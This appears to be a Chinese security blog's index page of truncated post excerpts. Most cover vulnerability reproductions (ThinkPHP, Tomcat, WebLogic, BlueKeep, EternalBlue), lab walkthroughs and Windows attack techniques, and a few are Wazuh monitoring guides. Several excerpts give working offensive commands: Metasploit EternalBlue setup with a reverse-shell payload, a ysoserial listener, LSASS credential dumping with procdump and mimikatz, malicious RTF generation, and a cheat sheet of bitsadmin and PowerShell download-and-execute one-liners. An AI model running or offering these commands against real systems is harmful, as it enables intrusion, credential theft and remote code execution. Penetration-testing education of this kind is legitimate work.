红队攻击面相关讨论

0x00 前言 ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。 0x01 影响范围 5.x < 5.1.31, <= 5.0.23 0x02 漏洞分析 Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815 路由信息中controller的部分进行了过滤，可知问题出现在路由调度时 关键代码： 在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。 其中使用了$this->app->controller方法来实例化控制器，然后调用实例中的方法。跟进controller方法： 其中通过parseModuleAndClass方法解析出$module和$class，然后实例化$class。 而parseModuleAndClass方法中，当$…

tomcat7.x远程命令执行（CVE-2017-12615）漏洞漏洞复现 一、漏洞前言 2017年9月19日，Apache Tomcat官方确认并修复了两个高危漏洞，漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间，在一定条件下，攻击者可以利用这两个漏洞，获取用户服务器上 JSP 文件的源代码，或是通过精心构造的攻击请求，向用户服务器上传恶意JSP文件，通过上传的 JSP 文件 ，可在用户服务器上执行任意代码，从而导致数据泄露或获取服务器权限，存在高安全风险 二、漏洞名称 CVE-2017-12615-远程代码执行漏洞 三、危害等级: 高危 四、漏洞描述: CVE-2017-12616：信息泄露漏洞 当 Tomcat 中使用了 VirtualDirContext 时，攻击者将能通过发送精心构造的恶意请求，绕过设置的相关安全限制，或是获取到由 VirtualDirContext 提供支持资源的 JSP 源代码。 CVE-2017-12615：远程代码执行漏洞 当 Tomcat 运行在 Windows 主机上，且启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后，JSP 文件中的代码将能被服务器执行。 通过以上两个漏洞可在用户服务器上执行任意代码，从而导致数据泄露或获取服务器权限，存在高安全风…

0x01 前言 Typhoon VM包含多个漏洞和配置错误。Typhoon可用于测试网络服务中的漏洞，配置错误，易受攻击的Web应用程序，密码破解攻击，权限提升攻击，后期利用步骤，信息收集和DNS攻击。 Typhoon-v1.02镜像下载地址： https://download.vulnhub.com/typhoon/Typhoon-v1.02.ova.torrent 0x02 信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.104就是目标靶机系统 2.端口探测 nmap-A 192.168.1.104 root@kali2018:~# nmap -A 192.168.1.104 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-30 09:17 EST Nmap scan report for 192.168.1.104 Host is up (0.0012s latency). Not shown: 983 closed ports PORT STATE SERVICE VERSION 21/tcp open ftpvsftpd 3.0.2 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.…

一、文件/文件夹管理 ls #列出当前目录文件（不包括隐含文件） ls -a #列出当前目录文件（包括隐含文件） ls -l #列出当前目录下文件的详细信息 ls -al #列出当前详细目录文件和隐藏的文件信息 cd .. #回当前目录的上一级目录 cd ~ #回当前用户的宿主目录 cd 目录名 #改变当前目录 pwd #查看当前目录路径 mkdir test #创建一个空目录 rmdir test #删除一个空目录 rm -rf dir #删除所有含有目录和文件 rm filename #删除一个文件或多个文件 mv /lib/usr /opt/ #将文件移动相对路经下的文件到…

前言 Editor : ZZULI-Frex PDF版：可下载预览 (建议在电脑上查看） 1.所需知识： (1).最基本的网页信息捕获以及文件下载。(点击链接即可进入都是在新窗口打开） (2).了解系统环境变量的作用以及如何添加环境变量。 2.所需网站： (1)www.sourceforge.net/projects/mingw-w64/files/mingw-w64/ (MinGw-W64库) (2)https://code.visualstudio.com/ (Vistual Studio Code官网) (3)https://up.woozooo.com/ (蓝奏云) 3.教程使用平台： Windows11 Pro x64 – VMware Workstation 17 Pro 4.推荐使用平台： Windows10 Pro x64 Windows11 Pro x64 Windows11 Home x64 1.下载、安装MinGw-W64并配置环境变量 1.进入MinGw官网，下拉找到“MinGW-W64 GCC-8.1.0”栏目下面的“x86_64-win32-seh”并点击，之后会进入 第二个界面，等待倒计时结束，会自动开始下载。 如果下载速度过慢或者无法进入该网页，请移步此处下载：https://frexcheat.lanzoul.com/iI2cN1boa2xc 密码:5…

1. 根据网卡获取的网段信息，对win7所在网段来一波存活主机检测，排除其他的之后目标锁定在主机号为128的主机上2. 对发现的存活主机来一波整体信息收集发现开了以下的端口，并且是一个域用户┌──(root💀kali)-[/]└─# nmap -A 192.168.164.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CSTNmap scan report for 192.168.164.128Host is up (0.00052s latency).Not shown: 989 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45|_http-title: Site doesn't have a title (text/html).135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Wi…

网络配置外网WIN7：ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 （NAT模式）ip2:10.0.20.98-vmnet1(仅主机模式)域主机成员：10.0.20.99-vmnet1(仅主机模式)10.0.10.111-vmnet2(仅主机模式)域控：10.0.10.110-vmnet2(仅主机模式)密码配置：Win7：win7/adminwin2016：Administrator/Admin@123、vulntarget.com\win2016 Admin#123win2019：vulntarget.com\administrator Admin@666信息收集扫描主机 arp-scan -l扫描同一网段中的存活主机发现一个存活主机:192.168.127.91扫描端口 扫描一下存活靶机的ip地址 nmap -sC -T4 192.168.127.91发现目标系统为win7,且开放了445端口，尝试利用永恒之蓝(ms17-010)打一波目标系统内网主机渗透在kali中输入命令：msfconsolemsf 6> search 17-010msf 6> use 0msf 6> set payload windows/x64/meterpreter/reverse_tcpmsf 6> set lport 6666msf 6> set lhost 192.168.127.129msf 6> set rhosts 192.168.127.9…

代理生命周期 注册代理 一旦代理程序安装在要监控的计算机上，就必须向Wazuh管理器注册才能建立通信。这可以通过命令行，Authd或RESTful API完成。 注册代理将保留在管理器中，直到用户将其删除。在任何给定时间内，代理可能有四种不同的状态，如下图所示： 代理状态 从未连接：代理已注册但尚未连接到管理器。 待定 身份验证过程正在等待：管理服务器已收到来自代理的连接请求，但尚未收到任何其他内容。这可能表示防火墙问题。代理将在其连接生命周期中处于此状态一次。 活动：代理已成功连接，现在可以与管理器通信。 已断开连接：如果代理在半小时内未收到来自代理的任何消息，则管理员将认为代理已断开连接。 删除代理 从agent主机的管理器中删除代理程序后，连接生命周期即将结束。这可以通过RESTful API，命令行或Authd完成（如果启用了force选项）。 强制插入 如果您尝试添加具有已注册到其他代理的IP地址的代理，该manage_agents命令将返回错误。您仍然可以使用-F选项强制添加。 列如： 安装了名为Server1的IP 10.0.0.10 的代理，并且ID为005.如果我们假设必须重新安装服务器，则必须重新安装新的代理并将其连接到管理器。在这种情况下，我们可以使用参数-F 0，这意味着将删除先前的代理（005）（使用备份），并且将使用IP重新创建新代理。新代理将具有新ID： /var/ossec/bin/manage_agents -n Server1 -a 10.10.10.10 -F …

一、日志数据收集 日志数据收集是从服务器或设备生成的记录中收集的实时过程。此组件可以通过文本文件或Windows事件日志接收日志。它还可以通过远程syslog直接接收日志，这对防火墙和其他此类设备非常有用。 此过程的目的是识别应用程序或系统程序错误，配置错误，入侵威胁，触发策略或安全问题。 Wazuh aegnt 的内存和CPU要求是，因为它的非常低的，主要作用是将事件转发给管理器。但是，在Wazuh管理器上，CPU和内存消耗可能会迅速增加，具体取决于管理器每秒事件数分析数量（EPS）。 1.处理流程 下图说明了事件的处理流程： 2.日志收集 2.1 日志文件 可以将日志分析引擎配置为监控服务器上的特定文件 示例配置： Linux： <localfile> <location>/var/log/example.log</location> <log_format>syslog</log_format> </localfile> windows： <localfile> <location>C:\myapp\example.log</location> <log_format>syslog</log_format> </localfile> 2.2Windows事件日志 Wazuh可以监控典型的Windows事…

一、wazhu部署架构 1.服务器上运行的Agent端会将采集到的各种信息通过加密信道传输到管理端。 2.管理端负责分析从代理接收的数据，并在事件与告警规则匹配时触发警报。 3.LogStash会将告警日志或者监控日志发送到Elasticsearch上面，最后通过Kibana可视化展示日志。 分布式部署：在不同主机上运行Wazuh服务器和Elastic Stack集群（一个或多个服务器）。 单主机架构：在同一主机上运行Wazuh服务器和Elastic Stack。 两者的主要差别在于，前者需要使用FileBeat与Logstash进行日志传输，后者直接本机读取日志文件 图一：分布式部署 图二：单主机架构 二、更新源配置 如果网速比较慢的可以更换为国内软件源，默认情况下并不用 yum repolist #查看当前使用的源 cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bak #备份原来的源 wget http://mirrors.aliyun.com/repo/Centos-7.repo #下载阿里云centos7源 wget …

安装Wazuh服务器 Wazuh服务器可以安装在任何类型的Unix操作系统上。最常见安装在Linux上。如果可以为您的系统提供自动化脚本，则安装过程会更容易，但是，从源码构建和安装也非常简单。 通常在Wazuh服务器上安装两个组件：管理器和API。此外，对于分布式体系结构（Wazuh服务器将数据发送到远程Elastic Stack集群），需要安装Filebeat。 安装Wazuh服务器有多种选择，具体取决于操作系统以及是否希望从源代码构建。请参阅下表并选择如何安装： 类型描述 RPM包 在CentOS / RHEL / Fedora上安装Wazuh服务器 DEB包 在Debian/Ubuntu上安装Wazuh服务器 注意 强烈建议在64位操作系统上安装Wazuh Server，因为Wazuh API在32位平台上不可用。如果没有Wazuh API，Wazuh Kibana应用程序的大部分功能都将无法使用。同样，如果您为Wazuh Server平台使用Red Hat或CentOS，请确保它是版本6或更高版本才能正确安装Wazuh API。 使用RPM软件包安装Wazuh服务器 对于CentOS / RHEL / Fedora平台，安装Wazuh服务器组件需要在添加更新源后安装相关软件包。 注意：下面使用的许多命令都需要以root用户权限执行。 添加Wazuh存储库 设置Wazuh的第一步是将Wazuh更新源添加到您的系统中。如果您想直接下载wazuh-manager软件包，或查看兼…

0x01 漏洞描述 近日，Oracle WebLogic Server 远程代码执行漏洞 （CVE-2020-14882）POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求，利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件，且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后，远程且未经授权的攻击者可以直接在服务端执行任意代码，获取系统权限 0x02 漏洞影响 Oracle WebLogic Server，版本10.3.6.0，12.1.3.0，12.2.1.3，12.2.1.4，14.1.1.0 0x03 漏洞复现： 一、环境配置 1.本次漏洞复现采用vulhub的环境，weblocig的版本为12.2.1.3.0,该版本存在漏洞 https://github.com/vulhub/vulhub/tree/173136b310693d50cac183c6218e64c861e2aaf5/weblogic/CVE-2020-14882 2.复现漏洞环境配置 git clone https://github.com/vulhub/vulhub.git cd vulhub/ cd weblogic/ curl -s https://bootstrap.pypa.io/get-pip.py | pyt…

0x00 简介 北京时间10月17日，Oracle官方发布的10月关键补充更新CPU（重要补丁更新）中修复了一个高危的WebLogic远程代码执行漏洞（CVE-2018-3191）。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而造成远程代码执行。 0x01 漏洞复现 目标weblogci服务器已开放了T3服务，该服务器是部署在linux下，可以用https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-262进行在 docker下部署测试环境。 1.在JRMPListener主机（公网上的一台主机,ubunut系统，IP地址为：149.28.*.85）上运行以下命令: wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command] 如： java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.ja…

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) -----by backlion 0x01漏洞说明 近日，黑客利用WebLogic 反序列化漏洞CVE-2017-3248和WebLogic WLS LS组件的远程代码执行漏洞CVE-2017-10271，Oracle官方在2017年10月份发布了该漏洞的补丁，但没有公开漏洞细节，如果企业未及时安装补丁，存在被攻击的风险。对企业服务器发起了大范围远程攻击，对大量企业的服务器造成了严重威胁，受影响版本：10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 0x02 攻击说明 攻击者选定要攻击的目标主机后，将首先利用漏洞CVE-2017-3248进行攻击，无论是否成功，都将再利用CVE-2017-10271进行攻击。在每一次的攻击过程中，都是先针对Windows系统，再针对Linux系统。具体攻击流程如下： 1、利用 WebLogic 反序列化漏洞（CVE-2017-3248）调用 Linux 中的wget 下载shell脚本并调用Linux本地“/bin/bash”执行shell脚本。（shell脚本内容内定义了从远端下载执行watch-smartd挖矿程序控制细节） 2、 利用 WebLogic 反序列化漏洞（CVE-2017-3248）调用 Windows 中的PowerShell进行样本下载和运…

前言lsass.exe（Local Security Authority Subsystem Service进程空间中，存有着机器的域、本地用户名和密码等重要信息。如果获取本地高权限，用户便可以访问LSASS进程内存，从而可以导出内部数据（password），用于横向移动和权限提升。通过lsass转储用户密码或者hash也算是渗透过程中必不可少的一步，这里学习一下原理以及记录下多种转储方法。 [toc] 常规方法mimikatz::logonpasswords我们通常将这些工具称为LOLBins，指攻击者可以使用这些二进制文件执行超出其原始目的的操作。 我们关注LOLBins中导出内存的程序。 白名单工具三个微软签名的白名单程序 Procdump.exe SQLDumper.exe createdump.exe Procdump转储Lsass.exe的内存ProcDump是微软签名的合法二进制文件，被提供用于转储进程内存。可以在微软文档中下载官方给出的ProcDump文件 用Procdump 抓取lsass进程dmp文件， procdump64.exe -accepteula -ma lsass.exe lsass_dump 然后可以配置mimikatz使用 sekurlsa::Minidump lsassdump.dmp sekurlsa::logonPasswords 如果对lsass.exe敏感的话，那么还可以配合lsass.exe的pid来使用 procdump64.exe -accepteula -ma pid lsass_d…

Microsoft Word下的恶意RTF文件容易被收到攻击，在本文中，我们使用python脚本对Microsoft Word 2013进行oday攻击演示，该脚本会生成恶意的.rtf文件，并提供目标系统的篡改会话。 利用工具包CVE-2017-0199 - v2.0是一个很有用的python利用脚本，它提供了一种快速有效的利用Microsoft RTF RCE进行攻击的方式。它可以生成恶意的RTF文件，并将metasploit 下meterpreter反弹shell有效载荷提供给攻击者，而不需要任何复杂的配置。 测试环境： 攻击者：Kali Linux（ip:192.168.1.24） 目标：Windows 10（ Microsoft Word 2013 ） 1.打开您的kali Linux的shell终端，然后输入以下命令生成一个恶意rtf： git clone https://github.com/bhdresh/CVE-2017-0199.git 此命令将运行一个python脚本来生成富文本格式的有效载荷，其中-M用于生成rtf文件,-w用于生成rtf文件的名称，即sales.rtf， -u为攻击者的IP地址或域名。 cd CVE-2017-0199 python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc 以下截图中的命令输出生成的恶意.rtf文件即sales.rtf文件可以在系统中找到。…

Windows本地权限维持 篡改非特权账户 这里要提到两比较特殊的组 1.备份操作员组（Backup Operators） 2.远程连接组（Remote Management Users） 分配组成员身份 使非特权用户获得管理权限的直接方法是使其成为 Administrators 组的一部分。 C:\> net localgroup administrators thmuser0 /add 如果这看起来太可疑，则可以使用“备份操作员”组。此组中的用户将没有管理权限，但将允许读取/写入系统上的任何文件或注册表项，忽略任何配置的 DACL。 C:\> net localgroup "Backup Operators" thmuser1 /add 由于这是一个非特权帐户，因此除非我们将其添加到远程桌面用户 （RDP） 或远程管理用户 （WinRM） 组，否则它无法 RDP 或 WinRM 返回到计算机。 C:\> net localgroup "Remote Management Users" thmuser1 /add UAC 实现的功能之一 LocalAccountTokenFilterPolicy 在远程登录时剥夺任何本地帐户的管理权限(就是在每一次执行时询问窗口，在命令行无法直接开见所有需要屏蔽掉) 首先，让我们建立 WinRM 连接，并检查是否为用户启用了备份操作员组： evil-winrm -i 10.10.73.241 -u thmuser1 -p Password321 然后盗取…

0x00 漏洞描述 Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响范围较广如：windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击，该服务器漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞，跟之前的勒索，永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证，导致可以绕过认证，不用任何的交互，直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用，会导致服务器入侵，中病毒，像WannaCry 永恒之蓝漏洞一样大规模的感染。2019年9月7日晚上凌晨1点左右，metaspolit更新了漏洞利用程序 在2019年5月，微软发布了针对远程代码执行漏洞CVE-2019-0708的补丁更新，该漏洞也称为“BlueKeep”，漏洞存在于远程桌面服务（RDS）的代码中。此漏洞是预身份验证，无需用户交互，因此具有潜在武器化蠕虫性性漏洞利用的危险。如果成功利用此漏洞，则可以使用“系统”权限执行任意代码。Microsoft安全响应中心的建议表明这个漏洞也可能会成为一种蠕虫攻击行为，类似于Wannacry和EsteemAudit等攻击行为。由于此漏洞的严重性及其对用户的潜在影响，微软采取了罕见的预警步骤，为不再受支持的Windows XP操作系统发布补丁，以保护Windows用户。 0x01 漏洞影响 该漏洞影响旧版本的Windows系统，包括： Windows 7、Wind…

0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型，它的内容是XML格式进行编写的，主要用于创建Windows设置页面的快捷方式.Windows 10下行.SettingContent-ms后缀的文件，系统并未判断该类文件所在的路径是否在控制面板相关目录下，便直接执行了文件中用于控制面板设置相关的深层链接标签指定的任意程序，导致用户执行系统任意目录下的此类文件或者从网络上下载的经过精心设计的.SettingContent-ms文件也会直接执行其中指定的恶意程序对象，导致任意代码执行. 文件包含一个<DeepLink>标记，它带有带参数的任何二进制文件并执行它。这可能会导致问题，因为攻击者可以使用指向二进制文件（如cmd.exe或PowerShell.exe）的DeepLink元素创建.SettingContent-ms文件，该文件为其提供shell命令执行。 0x01 Windows Defender AV ASR Rules Windows Defender AV ASR Rules主要是为了解决防止漏洞利用恶意软件感染计算机和应用程序，它是在Windows 10, version 1709 and later和Windows Server 2016中引入的，所有说之前的Windows Defender版本是没有ASR Rules的。 从以下版本开始：Windows 10版本1703到1803 和Windows…

0x00 漏洞描述 漏洞公告显示，SMB 3.1.1协议中处理压缩消息时，对其中数据没有经过安全检查，直接使用会引发内存破坏漏洞，可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行，受黑客攻击的目标系统只需开机在线即可能被入侵。 0x01 漏洞响应版本 Windows 10 1903版本（用于基于x32的系统） Windows 10 1903版（用于基于x64的系统） Windows 10 1903版（用于基于ARM64的系统） Windows Server 1903版（服务器核心安装） Windows 10 1909版本（用于基于x32的系统） Windows 10版本1909（用于基于x64的系统） Windows 10 1909版（用于基于ARM64的系统） Windows Server版本1909（服务器核心安装） 0x02 漏洞分析 漏洞公告显示，SMB 3.1.1协议中处理压缩消息时，对其中数据没有经过安全检查，直接使用会引发内存破坏漏洞，可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行，受黑客攻击的目标系统只需开机在线即可能被入侵。 1.根本原因 漏洞发生在srv2.sys中,由于SMB没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法.最终导致整数溢出。 2.初步分析 该错误是发生在srv2.sys SMB服务器驱动程序中的Srv2DecompressData函数中的整数溢出错误。这是该函数的简化版本，省略了…

0x00 漏洞背景 2020年10月14日，某监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告，该漏洞是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement（路由通告）数据包时存在漏洞，远程攻击者通过构造特制的ICMPv6 Router Advertisement（路由通告）数据包 ，并将其发送到远程Windows主机上，可造成远程BSOD，漏洞编号为CVE-2020-16898。 0x01 影响版本 操作系统版本版本补丁经过测试 Windows 10 X86 / x64 / ARM64 1709 ✔️ Windows 10 X86 / x64 / ARM64 1803 ✔️ Windows 10 X86 / x64 / ARM64 1809年 ✔️ Windows 10 X86 / x64 / ARM64 1903年 ✔️ Windows 10 X86 / x64 / ARM64 1909年 ✔️ Windows 10 X86 / x64 / ARM64 2004年 ✔️ Windows Server 2019 Windows Server 2019（服务器核心版） Windows Server 1903版（服务器核心版） Windows Server版本1909（服务器核心版） Windows Server 2004版（服务器核心版本） …

windows2016上如何通过攻击ETERNALBLUE获得meterpreter反弹 译：by backlion 0x00前言 当微软发布MS17-010漏洞的补丁时，该漏洞影响的范围是从Windows 7到Windows Server 2016系统版本。然而，The ShadowBrokers发布的永恒之蓝攻击是非常不稳定的，可能影响到Windows Server 2012和以后的操作系统版本，导致99％的机器受到永恒之蓝的攻击。为了理解并能更好地应用，NSA已发布的漏洞通过了许多安全研究人员的研究。正因为如此，几天前，已经发布了永恒之石SYNERGY的bug漏洞（由Sleepya开发的）。并改进了漏洞利用，使其在攻击Windows Server 2012和2016系统时更加稳定。但事实是，如果你想使用这个漏洞，需要进一步弄清楚是，当我们影响目标机器时，是否了解到真正的工作原理，以及需要修改一些代码，以获得我们所期望的目标是必然的。 这就是为什么在分析漏洞之后，我再次来发布另一个如何攻击windows2016的文章。通一步一步的步骤，作者将解释所有漏洞利用的问题，使得Sleepya发布的永恒之蓝漏洞能够正常的利用，以及如何修改其特征，以便在目标机器上获得一个meterpreter反弹shell. 0x01 漏洞利用 实验搭建环境： 要搭建的实验环境，我们需要配置以下主机： 目标主机-----Windows Server 2016（将使用Windows Server 2016 64位的机器作为目标主机） …

1.bitsadmin命令（只能命令下载到指定路径上，win7以上）： bitsadmin /transfer myDownLoadJob /download /priority normal "https://www.ishack.org/tu/rtjxy4ppzcc18198.jpg" "d:\abc.jpg" bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe 2.powershell命名下载执行：（win7以上） powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz powershell -exec bypass -f \\webdavserver\folder\payload.ps1 powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:\111111111111111.exe’) powershell -w h…

Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute malicious code in order to abuse a system. From the other side patching systems sufficiently is one of the main problems in security. Even if an organization has a patching policy in place if important patches are not implemented immediately this can still give short window to an attacker to exploit a vulnerability and escalate his privileges inside a system and therefore inside the network. This article will discuss how to identify missing patches related to privilege escalation and the necessary code to exploit the issue. Discovery of Missing Patches The discovery of m…

0x00 场景 本次目标是获取“ redhook.DA”域中帐户的一个可用凭据。从一个控制内网主机的权限开始，但尚未与目标域控制器处于同一子网中。如下图所示： 此外，假设攻击者获取了client 1主机中的本地管理员缓存认证凭据。通常，如果网络范围足够大，将通过批处理，vbs，.NET，ps1等脚本在网络共享上找到相应的存储的有效凭据。以获得初始访问权限。在这篇文章中，本次攻击者为在kali主机上，重点讲述在Windows上横向移动的方法以及不包括绕过AV的情况。 0x00 攻击clicent1主机 1.批处理脚本获取 如上所述。通过网络共享上的批处理及脚本获取了clent1（10.0.0.129）主机的用户认证凭据： # Mock contents of \\FileServer\Users\bob\Workstations\ErrorLog.bat @echo off net use "\\10.0.0.129\C$" /user:bob ImSoSecur3! #建立共享 if exist "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" ( echo "Sigh, more errors on Client1! Copying.." copy "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" C:\Users\bob\Logs\Client1\ del "\\10.0.…